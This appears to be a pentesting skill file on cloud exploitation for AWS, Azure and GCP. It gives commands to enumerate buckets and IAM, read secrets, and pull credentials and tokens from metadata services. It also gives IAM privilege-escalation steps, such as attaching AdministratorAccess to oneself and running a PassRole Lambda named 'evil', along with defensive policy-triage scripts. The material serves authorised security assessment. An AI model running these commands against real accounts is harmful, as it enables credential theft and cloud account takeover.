name: exploiting-cloud-platforms
description: Exploit AWS, Azure, and GCP cloud misconfigurations including S3 buckets, IAM roles, metadata services, serverless functions, and cloud-specific privilege escalation. Use when pentesting cloud environments or assessing cloud security.

Exploiting Cloud Platforms

When to Use

  • AWS, Azure, or GCP security assessment
  • Cloud misconfiguration exploitation
  • S3/Blob/Storage bucket hunting
  • Cloud IAM privilege escalation
  • Serverless function exploitation
  • Cloud metadata service abuse

AWS Security

AWS CLI Setup

# Configure credentials
aws configure
# Or export directly
export AWS_ACCESS_KEY_ID=AKIAIOSFODNN7EXAMPLE
export AWS_SECRET_ACCESS_KEY=wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY
export AWS_DEFAULT_REGION=us-east-1

# Test credentials
aws sts get-caller-identity

# List available regions
aws ec2 describe-regions

S3 Bucket Enumeration

# List buckets
aws s3 ls

# List bucket contents
aws s3 ls s3://bucket-name/
aws s3 ls s3://bucket-name/ --recursive

# Download bucket contents
aws s3 sync s3://bucket-name/ ./local-folder/

# Check public access
aws s3api get-bucket-acl --bucket bucket-name
aws s3api get-bucket-policy --bucket bucket-name

# Test unauthenticated access
aws s3 ls s3://bucket-name/ --no-sign-request
curl https://bucket-name.s3.amazonaws.com/
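The ACL and bucket-policy checks above each produce a JSON document; the following added example (not part of the original page) triages both into one answer, "who can read this bucket?". The bucket name, SIDs and VPC id in the samples are constructed.

```python
"""Triage S3 exposure from `get-bucket-acl` / `get-bucket-policy` output.

Added example, not from the original page: reduces the two JSON documents the
commands above return to one question, "who can read this bucket?".
"""
import json

ALL_USERS = "http://acs.amazonaws.com/groups/global/AllUsers"
AUTH_USERS = "http://acs.amazonaws.com/groups/global/AuthenticatedUsers"


def acl_public_grants(acl):
    """Permissions the ACL grants to everyone or to any AWS account."""
    out = {}
    for g in acl.get("Grants", []):
        uri = g.get("Grantee", {}).get("URI")
        if uri in (ALL_USERS, AUTH_USERS):
            out.setdefault(uri.rsplit("/", 1)[1], set()).add(g["Permission"])
    return out


def is_wildcard(principal):
    """Principal "*" or {"AWS": "*"} (string or list) means anyone."""
    if isinstance(principal, dict):
        principal = principal.get("AWS", [])
    if isinstance(principal, str):
        principal = [principal]
    return "*" in (principal or [])


def policy_public_statements(policy_output):
    """Allow statements open to anyone; unconditional ones are listed first."""
    doc = json.loads(policy_output["Policy"])  # the CLI nests the document as a string
    stmts = doc.get("Statement", [])
    stmts = [stmts] if isinstance(stmts, dict) else stmts
    hits = [{"Sid": s.get("Sid", ""), "Action": s.get("Action"), "conditional": "Condition" in s}
            for s in stmts if s.get("Effect") == "Allow" and is_wildcard(s.get("Principal"))]
    return sorted(hits, key=lambda h: h["conditional"])


# Constructed samples in the shape the CLI prints.
SAMPLE_ACL = {"Grants": [
    {"Grantee": {"Type": "CanonicalUser", "ID": "owner"}, "Permission": "FULL_CONTROL"},
    {"Grantee": {"Type": "Group", "URI": ALL_USERS}, "Permission": "READ"}]}
SAMPLE_POLICY = {"Policy": json.dumps({"Version": "2012-10-17", "Statement": [
    {"Sid": "Site", "Effect": "Allow", "Principal": "*", "Action": "s3:GetObject",
     "Resource": "arn:aws:s3:::example-bucket/*"},
    {"Sid": "VpcOnly", "Effect": "Allow", "Principal": {"AWS": "*"}, "Action": "s3:*",
     "Resource": "arn:aws:s3:::example-bucket",
     "Condition": {"StringEquals": {"aws:SourceVpc": "vpc-0000"}}}]})}
```

A statement with a wildcard principal but a Condition (the VpcOnly one) is still worth reviewing, which is why it is reported last rather than dropped.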

S3 Bucket Discovery:

# Common naming patterns
company-backup
company-data
company-dev
company-prod
company-logs
company-assets

# Tools
# s3scanner
python3 s3scanner.py buckets.txt

# S3 Inspector
python3 s3inspector.py --bucket-file buckets.txt

IAM Enumeration

# Current user info
aws sts get-caller-identity

# List IAM users (if allowed)
aws iam list-users

# List user policies
aws iam list-attached-user-policies --user-name username
aws iam list-user-policies --user-name username

# Get policy details
aws iam get-policy --policy-arn arn:aws:iam::aws:policy/PolicyName
aws iam get-policy-version --policy-arn arn --version-id v1

# List roles
aws iam list-roles

# List groups
aws iam list-groups

EC2 Enumeration

# List instances
aws ec2 describe-instances

# Get instance metadata (from instance)
curl http://169.254.169.254/latest/meta-data/
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/role-name

# List security groups
aws ec2 describe-security-groups

# List key pairs
aws ec2 describe-key-pairs

# List snapshots
aws ec2 describe-snapshots --owner-ids self

# Public snapshots by account
aws ec2 describe-snapshots --owner-ids 123456789012 --restorable-by-user-ids all

Lambda Functions

# List functions
aws lambda list-functions

# Get function code
aws lambda get-function --function-name function-name

# Invoke function
aws lambda invoke --function-name function-name output.txt

# Get function configuration
aws lambda get-function-configuration --function-name function-name

RDS Enumeration

# List DB instances
aws rds describe-db-instances

# List DB snapshots
aws rds describe-db-snapshots

# Check if publicly accessible
aws rds describe-db-instances --query 'DBInstances[*].[DBInstanceIdentifier,PubliclyAccessible]'

Secrets Manager

# List secrets
aws secretsmanager list-secrets

# Get secret value
aws secretsmanager get-secret-value --secret-id secret-name

CloudTrail (Logging)

# Check if CloudTrail is enabled
aws cloudtrail describe-trails

# Check trail status
aws cloudtrail get-trail-status --name trail-name

# Get recent events
aws cloudtrail lookup-events

AWS Privilege Escalation

Common Misconfigurations:

# iam:CreatePolicyVersion - modify existing policies
# iam:SetDefaultPolicyVersion - set older policy version
# iam:PassRole + lambda:CreateFunction - execute code as role
# iam:AttachUserPolicy - attach admin policy to self
# iam:PutUserPolicy - add inline policy to self
# iam:CreateAccessKey - create keys for other users
# iam:UpdateAssumeRolePolicy - modify trust relationships
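The permissions listed above are easy to miss when a policy grants them through wildcards such as iam:Create* or lambda:*. This added example (not from the original page) takes the policy document returned by `aws iam get-policy-version` and reports which of those primitives it effectively grants; the sample policy is constructed.

```python
"""Flag IAM privilege-escalation primitives in a policy document.

Added example, not from the original page: given the document returned by
`aws iam get-policy-version`, report which of the risky permissions listed
above it grants, expanding wildcards the way IAM does. Resource scoping is
ignored, so treat hits as leads to review rather than proof.
"""
import fnmatch

# The primitives listed above; the Lambda path needs both halves.
SINGLE_ACTIONS = {"iam:CreatePolicyVersion", "iam:SetDefaultPolicyVersion",
                  "iam:AttachUserPolicy", "iam:PutUserPolicy",
                  "iam:CreateAccessKey", "iam:UpdateAssumeRolePolicy"}
COMBINED_ACTIONS = [("iam:PassRole", "lambda:CreateFunction")]


def action_patterns(policy, effect):
    """Collect the Action patterns of every statement with the given Effect."""
    stmts = policy.get("Statement", [])
    stmts = [stmts] if isinstance(stmts, dict) else stmts   # single-statement form
    patterns = []
    for s in stmts:
        if s.get("Effect") == effect and "Action" in s:
            a = s["Action"]
            patterns.extend([a] if isinstance(a, str) else a)
    return patterns


def grants(policy, action):
    """True if an Allow matches and no explicit Deny does (case-insensitive, * and ?)."""
    def match(effect):
        return any(fnmatch.fnmatchcase(action.lower(), p.lower())
                   for p in action_patterns(policy, effect))
    return match("Allow") and not match("Deny")


def find_privesc(policy):
    """Sorted list of risky permissions (or combinations) the policy grants."""
    found = [a for a in SINGLE_ACTIONS if grants(policy, a)]
    found += [" + ".join(c) for c in COMBINED_ACTIONS if all(grants(policy, a) for a in c)]
    return sorted(found)


# Constructed sample: wildcards quietly include two primitives; the Deny removes a third.
SAMPLE_POLICY = {"Version": "2012-10-17", "Statement": [
    {"Effect": "Allow", "Action": ["s3:GetObject", "s3:ListBucket"], "Resource": "*"},
    {"Effect": "Allow", "Action": "lambda:*", "Resource": "*"},
    {"Effect": "Allow", "Action": ["iam:PassRole", "iam:Put*", "iam:Create*"], "Resource": "*"},
    {"Effect": "Deny", "Action": "iam:CreateAccessKey", "Resource": "*"},
]}
```

Run `find_privesc(SAMPLE_POLICY)` to see the three hits; NotAction statements and resource constraints are not evaluated, so a clean result is not a guarantee.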

Exploitation Examples:

# Create access key for admin user (if iam:CreateAccessKey)
aws iam create-access-key --user-name admin-user

# Attach admin policy (if iam:AttachUserPolicy)
aws iam attach-user-policy --user-name current-user --policy-arn arn:aws:iam::aws:policy/AdministratorAccess

# PassRole + Lambda
aws lambda create-function --function-name evil --runtime python3.9 --role arn:aws:iam::ACCOUNT:role/AdminRole --handler lambda_function.lambda_handler --zip-file fileb://function.zip
aws lambda invoke --function-name evil output.txt

Azure Security

Azure CLI Setup

# Login
az login

# Login with service principal
az login --service-principal -u APP_ID -p PASSWORD --tenant TENANT_ID

# Get current account
az account show

# List subscriptions
az account list

Blob Storage Enumeration

# List storage accounts
az storage account list

# List containers
az storage container list --account-name accountname

# List blobs
az storage blob list --container-name containername --account-name accountname

# Download blob
az storage blob download --container-name containername --name filename --account-name accountname

# Check public access
az storage container show --name containername --account-name accountname

# Test unauthenticated access
curl https://accountname.blob.core.windows.net/container/file

Blob Discovery:

# Common patterns
companyname
companyname-backup
companyname-data
companyname-files

# MicroBurst (PowerShell)
Invoke-EnumerateAzureBlobs -Base company

VM Enumeration

# List VMs
az vm list

# List VM images
az vm image list

# Get VM details
az vm show --resource-group RG --name VMname

# List NICs
az network nic list

# List public IPs
az network public-ip list

Azure AD Enumeration

# List users
az ad user list

# Get current user
az ad signed-in-user show

# List groups
az ad group list

# List service principals
az ad sp list

# List applications
az ad app list

Function Apps

# List function apps
az functionapp list

# Get function app details
az functionapp show --name functionappname --resource-group RG

# List functions
az functionapp function list --name functionappname --resource-group RG

# Inspect app settings (where hardcoded secrets usually end up); note that
# "deployment source config-zip" deploys a package via --src, it does not download code
az functionapp config appsettings list --name functionappname --resource-group RG

Key Vault

# List key vaults
az keyvault list

# List secrets
az keyvault secret list --vault-name vaultname

# Get secret
az keyvault secret show --name secretname --vault-name vaultname

Azure Metadata Service

# From Azure VM
curl -H Metadata:true "http://169.254.169.254/metadata/instance?api-version=2021-02-01"

# Get access token
curl -H Metadata:true "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/"

GCP Security

gcloud Setup

# Login
gcloud auth login

# Login with service account
gcloud auth activate-service-account --key-file=key.json

# Get current account
gcloud config list

# List projects
gcloud projects list

Storage Bucket Enumeration

# List buckets
gsutil ls

# List bucket contents
gsutil ls gs://bucket-name/

# Download files
gsutil cp gs://bucket-name/file.txt ./

# Check bucket permissions
gsutil iam get gs://bucket-name/

# Test unauthenticated access
curl https://storage.googleapis.com/bucket-name/file.txt

Bucket Discovery:

# Common patterns
company-backup
company-data
company_backup
company_data

# GCPBucketBrute
python3 gcpbucketbrute.py -k company

Compute Engine

# List instances
gcloud compute instances list

# Get instance details
gcloud compute instances describe instance-name --zone=zone

# List disks
gcloud compute disks list

# List snapshots
gcloud compute snapshots list

# List firewall rules
gcloud compute firewall-rules list

IAM Enumeration

# List service accounts
gcloud iam service-accounts list

# Get IAM policy
gcloud projects get-iam-policy PROJECT_ID

# List roles
gcloud iam roles list

# Describe role
gcloud iam roles describe roles/editor
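The project IAM policy returned by `gcloud projects get-iam-policy PROJECT_ID --format=json` is where public members and over-broad basic roles show up. This added example (not from the original page) walks the bindings and reports both; the project, members and etag in the sample are constructed.

```python
"""Flag risky bindings in `gcloud projects get-iam-policy --format=json` output.

Added example, not from the original page. It reports public members
(allUsers / allAuthenticatedUsers) and any member holding the basic roles
owner/editor, which grant far more than most workloads need.
"""
PUBLIC_MEMBERS = {"allUsers", "allAuthenticatedUsers"}
BASIC_ROLES = {"roles/owner", "roles/editor"}


def risky_bindings(policy):
    """Return sorted (member, role, reason) tuples; conditional bindings are tagged."""
    findings = []
    for b in policy.get("bindings", []):
        role = b.get("role", "")
        suffix = " (conditional)" if "condition" in b else ""
        for m in b.get("members", []):
            if m in PUBLIC_MEMBERS:
                findings.append((m, role, "public" + suffix))
            if role in BASIC_ROLES:
                findings.append((m, role, "basic-role" + suffix))
    return sorted(findings)


# Constructed sample in the shape gcloud prints.
SAMPLE_POLICY = {"version": 1, "etag": "constructed-etag", "bindings": [
    {"role": "roles/owner", "members": ["user:admin@example.com"]},
    {"role": "roles/editor",
     "members": ["serviceAccount:ci@example-project.iam.gserviceaccount.com"]},
    {"role": "roles/storage.objectViewer", "members": ["allUsers"]},
    {"role": "roles/viewer", "members": ["group:dev@example.com"]},
]}
```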

Cloud Functions

# List functions
gcloud functions list

# Describe function
gcloud functions describe function-name --region=region

# Download source code (if accessible)
gcloud functions describe function-name --region=region --format="value(sourceArchiveUrl)"

GCP Metadata Service

# From GCP VM
curl "http://metadata.google.internal/computeMetadata/v1/?recursive=true" -H "Metadata-Flavor: Google"

# Get access token
curl "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token" -H "Metadata-Flavor: Google"

# Get service account email
curl "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/email" -H "Metadata-Flavor: Google"

Cloud Exploitation Tools

AWS:

# Pacu - AWS exploitation framework
python3 pacu.py

# ScoutSuite - Security auditing
python3 scout.py aws

# Prowler - Security assessment
./prowler -M csv

# WeirdAAL - AWS attack library
python3 weirdAAL.py

Azure:

# MicroBurst - PowerShell toolkit
Import-Module MicroBurst.psm1
Invoke-EnumerateAzureBlobs
Invoke-EnumerateAzureSubDomains

# ScoutSuite
python3 scout.py azure

# ROADtools - Azure AD
roadrecon auth
roadrecon gather
roadrecon gui

GCP:

# ScoutSuite
python3 scout.py gcp

# GCP-IAM-Privilege-Escalation
# Check for privilege escalation paths

Quick Cloud Wins

AWS:

  • Public S3 buckets with sensitive data
  • Overly permissive IAM policies
  • Unencrypted snapshots
  • Public RDS instances
  • Lambda functions with secrets in environment variables
  • EC2 metadata service abuse (SSRF)

Azure:

  • Public blob storage containers
  • Overly permissive RBAC
  • Exposed Key Vault secrets
  • Public-facing VMs with weak credentials
  • Function apps with hardcoded secrets

GCP:

  • Public storage buckets
  • Overly permissive IAM bindings
  • Public compute instances
  • Service account key exposure
  • Cloud Functions with secrets in code

Common Cloud Misconfigurations

  1. Public Storage - S3/Blob/GCS buckets with public read/write
  2. Excessive Permissions - Overly permissive IAM/RBAC policies
  3. Exposed Secrets - Keys/passwords in code, environment variables
  4. No MFA - Critical accounts without multi-factor authentication
  5. Open Security Groups - 0.0.0.0/0 access on sensitive ports
  6. Unencrypted Data - Storage/databases without encryption
  7. Default Credentials - Services using default passwords
  8. Exposed Metadata - SSRF to cloud metadata services
  9. Public Snapshots - EBS/disk snapshots publicly accessible
  10. CloudTrail Disabled - No logging of API calls

References